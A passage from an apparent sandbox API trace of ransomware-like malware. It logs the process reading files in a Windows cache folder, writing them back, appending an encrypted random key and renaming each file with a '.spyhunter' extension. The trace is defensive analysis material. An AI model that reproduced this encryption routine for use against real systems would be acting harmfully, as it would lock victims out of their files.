(lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".txt") returned 0x0 [0152.256] GetProcessHeap () returned 0x2c0000 [0152.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0152.256] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eddc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248eddc*=0x6e3, lpOverlapped=0x0) returned 1 [0152.292] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.292] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x248eddc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248eddc*=0x6e3, lpOverlapped=0x0) returned 1 [0152.292] GetProcessHeap () returned 0x2c0000 [0152.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0152.292] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.292] WriteFile (in: hFile=0x178, lpBuffer=0x248ee1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eddc, lpOverlapped=0x0 | out: lpBuffer=0x248ee1c*, lpNumberOfBytesWritten=0x248eddc*=0x4, lpOverlapped=0x0) returned 1 [0152.292] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eddc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eddc*=0x30, lpOverlapped=0x0) returned 1 [0152.292] CloseHandle (hObject=0x178) returned 1 [0152.292] GetProcessHeap () returned 0x2c0000 [0152.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.293] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.spyhunter") returned 161 [0152.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce.spyhunter")) returned 1 [0152.294] GetProcessHeap () returned 0x2c0000 [0152.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.294] GetProcessHeap () returned 0x2c0000 [0152.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.294] GetProcessHeap () returned 0x2c0000 [0152.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe7200 | out: hHeap=0x2c0000) returned 1 [0152.294] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee18 | out: pbBuffer=0x248ee18) returned 1 [0152.294] GetProcessHeap () returned 0x2c0000 [0152.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.294] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee10*=0x30) returned 1 [0152.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.295] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 151 [0152.295] StrStrW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".txt") returned 0x0 [0152.295] GetProcessHeap () returned 0x2c0000 [0152.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0152.295] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248edd4*=0x1d7, lpOverlapped=0x0) returned 1 [0152.296] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.296] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x248edd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248edd4*=0x1d7, lpOverlapped=0x0) returned 1 [0152.297] GetProcessHeap () returned 0x2c0000 [0152.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0152.297] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.297] WriteFile (in: hFile=0x178, lpBuffer=0x248ee14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edd4, lpOverlapped=0x0 | out: lpBuffer=0x248ee14*, lpNumberOfBytesWritten=0x248edd4*=0x4, lpOverlapped=0x0) returned 1 [0152.297] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edd4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edd4*=0x30, lpOverlapped=0x0) returned 1 [0152.297] CloseHandle (hObject=0x178) returned 1 [0152.297] GetProcessHeap () returned 0x2c0000 [0152.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.297] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.spyhunter") returned 161 [0152.297] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450.spyhunter")) returned 1 [0152.298] GetProcessHeap () returned 0x2c0000 [0152.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.298] GetProcessHeap () returned 0x2c0000 [0152.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.298] GetProcessHeap () returned 0x2c0000 [0152.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe67b8 | out: hHeap=0x2c0000) returned 1 [0152.299] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee18 | out: pbBuffer=0x248ee18) returned 1 [0152.299] GetProcessHeap () returned 0x2c0000 [0152.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.299] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee10*=0x30) returned 1 [0152.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 151 [0152.299] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".txt") returned 0x0 [0152.299] GetProcessHeap () returned 0x2c0000 [0152.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0152.299] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248edd4*=0x652, lpOverlapped=0x0) returned 1 [0152.606] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff9ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.606] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x652, lpNumberOfBytesWritten=0x248edd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248edd4*=0x652, lpOverlapped=0x0) returned 1 [0152.606] GetProcessHeap () returned 0x2c0000 [0152.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0152.606] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.606] WriteFile (in: hFile=0x178, lpBuffer=0x248ee14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edd4, lpOverlapped=0x0 | out: lpBuffer=0x248ee14*, lpNumberOfBytesWritten=0x248edd4*=0x4, lpOverlapped=0x0) returned 1 [0152.606] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edd4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edd4*=0x30, lpOverlapped=0x0) returned 1 [0152.606] CloseHandle (hObject=0x178) returned 1 [0152.606] GetProcessHeap () returned 0x2c0000 [0152.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.606] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.spyhunter") returned 161 [0152.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061.spyhunter")) returned 1 [0152.607] GetProcessHeap () returned 0x2c0000 [0152.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.607] GetProcessHeap () returned 0x2c0000 [0152.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.607] GetProcessHeap () returned 0x2c0000 [0152.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe6640 | out: hHeap=0x2c0000) returned 1 [0152.607] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee10 | out: pbBuffer=0x248ee10) returned 1 [0152.607] GetProcessHeap () returned 0x2c0000 [0152.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.608] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee08*=0x30) returned 1 [0152.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.608] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 151 [0152.608] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".txt") returned 0x0 [0152.608] GetProcessHeap () returned 0x2c0000 [0152.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0152.608] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edcc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248edcc*=0x6e3, lpOverlapped=0x0) returned 1 [0152.610] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.610] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x248edcc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248edcc*=0x6e3, lpOverlapped=0x0) returned 1 [0152.610] GetProcessHeap () returned 0x2c0000 [0152.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0152.610] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.610] WriteFile (in: hFile=0x178, lpBuffer=0x248ee0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edcc, lpOverlapped=0x0 | out: lpBuffer=0x248ee0c*, lpNumberOfBytesWritten=0x248edcc*=0x4, lpOverlapped=0x0) returned 1 [0152.610] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edcc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edcc*=0x30, lpOverlapped=0x0) returned 1 [0152.610] CloseHandle (hObject=0x178) returned 1 [0152.610] GetProcessHeap () returned 0x2c0000 [0152.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.610] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.spyhunter") returned 161 [0152.610] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416.spyhunter")) returned 1 [0152.611] GetProcessHeap () returned 0x2c0000 [0152.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.611] GetProcessHeap () returned 0x2c0000 [0152.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.611] GetProcessHeap () returned 0x2c0000 [0152.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe5ee8 | out: hHeap=0x2c0000) returned 1 [0152.611] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee10 | out: pbBuffer=0x248ee10) returned 1 [0152.611] GetProcessHeap () returned 0x2c0000 [0152.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.611] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee08*=0x30) returned 1 [0152.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.612] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 151 [0152.612] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".txt") returned 0x0 [0152.612] GetProcessHeap () returned 0x2c0000 [0152.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0152.612] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edcc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248edcc*=0x6e3, lpOverlapped=0x0) returned 1 [0152.613] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.613] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x248edcc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248edcc*=0x6e3, lpOverlapped=0x0) returned 1 [0152.614] GetProcessHeap () returned 0x2c0000 [0152.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0152.614] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.614] WriteFile (in: hFile=0x178, lpBuffer=0x248ee0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edcc, lpOverlapped=0x0 | out: lpBuffer=0x248ee0c*, lpNumberOfBytesWritten=0x248edcc*=0x4, lpOverlapped=0x0) returned 1 [0152.614] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edcc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edcc*=0x30, lpOverlapped=0x0) returned 1 [0152.614] CloseHandle (hObject=0x178) returned 1 [0152.614] GetProcessHeap () returned 0x2c0000 [0152.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.614] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.spyhunter") returned 161 [0152.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f.spyhunter")) returned 1 [0152.615] GetProcessHeap () returned 0x2c0000 [0152.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.615] GetProcessHeap () returned 0x2c0000 [0152.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.615] GetProcessHeap () returned 0x2c0000 [0152.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe1e08 | out: hHeap=0x2c0000) returned 1 [0152.615] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee08 | out: pbBuffer=0x248ee08) returned 1 [0152.615] GetProcessHeap () returned 0x2c0000 [0152.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.615] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee00*=0x30) returned 1 [0152.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.616] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 151 [0152.616] StrStrW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".txt") returned 0x0 [0152.616] GetProcessHeap () returned 0x2c0000 [0152.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0152.616] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edc4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248edc4*=0x56e, lpOverlapped=0x0) returned 1 [0152.697] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffa92, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.697] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x56e, lpNumberOfBytesWritten=0x248edc4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248edc4*=0x56e, lpOverlapped=0x0) returned 1 [0152.697] GetProcessHeap () returned 0x2c0000 [0152.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0152.697] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, 